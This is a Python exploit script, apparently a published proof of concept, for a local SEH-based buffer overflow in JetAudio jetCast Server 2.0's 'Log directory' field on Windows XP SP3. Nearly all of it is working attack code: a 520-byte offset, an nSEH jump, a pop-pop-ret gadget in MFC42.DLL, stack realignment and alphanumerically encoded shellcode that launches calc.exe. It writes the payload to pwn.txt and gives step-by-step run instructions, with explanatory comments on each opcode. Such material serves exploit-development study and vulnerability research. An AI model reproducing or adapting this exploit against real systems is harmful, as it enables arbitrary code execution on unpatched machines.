# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: May 13th, 2019
# Author: Connor McGarr (https://connormcgarr.github.io)
# Vendor Homepage: http://www.jetaudio.com/
# Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
# Version: v2.0
# Tested on: Windows XP SP3 EN

# TO RUN:
# 1. Run python script
# 2. Copy contents of pwn.txt
# 3. Open jetCast
# 4. Select Config
# 5. Paste contents of pwn.txt into "Log directory" field
# 6. Click "OK"
# 7. Click "Start"

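# NOTE(review): the byte-string escapes had lost their backslashes ("x25x01..."),
# which turns every opcode into literal ASCII text and breaks the 520-byte offset.
# They are restored below from the per-line disassembly comments.

# Zero EAX before each encoded chunk is built.
# Opcode 0x25 = AND EAX, imm32; the two masks share no set bits, so EAX ends up 0.
zero = "\x25\x01\x01\x01\x01"  # and eax, 0x01010101
zero += "\x25\x10\x10\x10\x10"  # and eax, 0x10101010

# Save the stack pointer as it is when the handler runs, so the decoded
# stub can put it back (via ECX) before the calc.exe code executes.
restore = "\x54"  # push esp
restore += "\x59"  # pop ecx
restore += "\x51"  # push ecx

# Re-point ESP (author's target: 0012FFAD) so the PUSHes below land just
# past this stub and execution falls through into the decoded bytes.
# Opcode 0x2d = SUB EAX, imm32 (not AND). The immediates are little-endian:
# 0x55554F4C + 0x55554F4C + 0x5555504D = 0xFFFFEEE5, so the net effect is
# EAX = ESP - 0xFFFFEEE5 = ESP + 0x111B (mod 2^32).
alignment = "\x54"  # push esp
alignment += "\x58"  # pop eax
alignment += "\x2d\x4c\x4f\x55\x55"  # sub eax, 0x55554F4C
alignment += "\x2d\x4c\x4f\x55\x55"  # sub eax, 0x55554F4C
alignment += "\x2d\x4d\x50\x55\x55"  # sub eax, 0x5555504D
alignment += "\x50"  # push eax
alignment += "\x5c"  # pop esp

# Encoded calc.exe payload. Each chunk zeroes EAX, subtracts three
# immediates so that EAX = -(a+b+c) mod 2^32 is the wanted dword, then
# pushes it. Chunks are pushed first-to-last, so chunk 1 sits at the
# highest address and executes last; `move` (pushed last) executes first.
# Decoded dwords, little-endian, in execution order:
#   move:    42 42 89 CC -> inc edx; inc edx; mov esp, ecx
#   chunk 4: 31 C9 51 68 -> xor ecx, ecx; push ecx; push imm32 ...
#   chunk 3: 63 61 6C 63 -> ... "calc" (the imm32 of that push)
#   chunk 2: 54 B8 C7 93 -> push esp; mov eax, imm32 ...
#   chunk 1: C2 77 FF D0 -> ... 0x77C293C7; call eax
# 0x77C293C7 is presumably a CRT/WinAPI exec routine on the tested
# XP SP3 build (msvcrt!system is a common candidate) -- confirm before reuse.

# 2C552D14 01552D14 01562E16 -> C2 77 FF D0
shellcode = zero
shellcode += "\x2d\x14\x2d\x55\x2c"  # sub eax, 0x2C552D14
shellcode += "\x2d\x14\x2d\x55\x01"  # sub eax, 0x01552D14
shellcode += "\x2d\x16\x2e\x56\x01"  # sub eax, 0x01562E16
shellcode += "\x50"  # push eax

# 24121729 24121739 2414194A -> 54 B8 C7 93
shellcode += zero
shellcode += "\x2d\x29\x17\x12\x24"  # sub eax, 0x24121729
shellcode += "\x2d\x39\x17\x12\x24"  # sub eax, 0x24121739
shellcode += "\x2d\x4a\x19\x14\x24"  # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
shellcode += "\x50"  # push eax

# 34313635 34313434 34313434 -> 63 61 6C 63 ("calc")
shellcode += zero
shellcode += "\x2d\x35\x36\x31\x34"  # sub eax, 0x34313635
shellcode += "\x2d\x34\x34\x31\x34"  # sub eax, 0x34313434
shellcode += "\x2d\x34\x34\x31\x34"  # sub eax, 0x34313434
shellcode += "\x50"  # push eax

# 323A1245 323A1245 333A1245 -> 31 C9 51 68
shellcode += zero
shellcode += "\x2d\x45\x12\x3a\x32"  # sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x32"  # sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x33"  # sub eax, 0x333A1245
shellcode += "\x50"  # push eax

# Restore the saved stack pointer: decodes to INC EDX; INC EDX; MOV ESP, ECX.
# The immediates below are little-endian (0x11273F40 etc.); their sum is
# 0x3376BDBE and -0x3376BDBE mod 2^32 = 0xCC894242 -> bytes 42 42 89 CC.
move = zero
move += "\x2d\x40\x3f\x27\x11"  # sub eax, 0x11273F40
move += "\x2d\x3f\x3f\x27\x11"  # sub eax, 0x11273F3F
move += "\x2d\x3f\x3f\x28\x11"  # sub eax, 0x11283F3F
move += "\x50"  # push eax


payload = "\x41" * 520  # offset to nSEH
payload += "\x70\x06\x71\x06"  # nSEH: JO +6; if not taken, falls through to JNO +6
payload += "\x2d\x10\x40\x5f"  # SEH: 0x5F40102D, pop pop ret in MFC42.DLL
payload += "\x41" * 2  # JO lands here (two INC ECX, harmless: `restore` reloads ECX); JNO lands on `restore`
payload += restore
payload += alignment
payload += shellcode
payload += move
# Padding to the total field size. ECX holds the saved ESP, so \x41 (INC ECX)
# would corrupt it; \x42 (INC EDX) is harmless.
payload += "\x42" * (5000 - len(payload))

# Every byte in the payload is < 0x80 and none is CR/LF, so a text-mode
# write is byte-exact on both Python 2 and 3.
with open('pwn.txt', 'w') as f:
    f.write(payload)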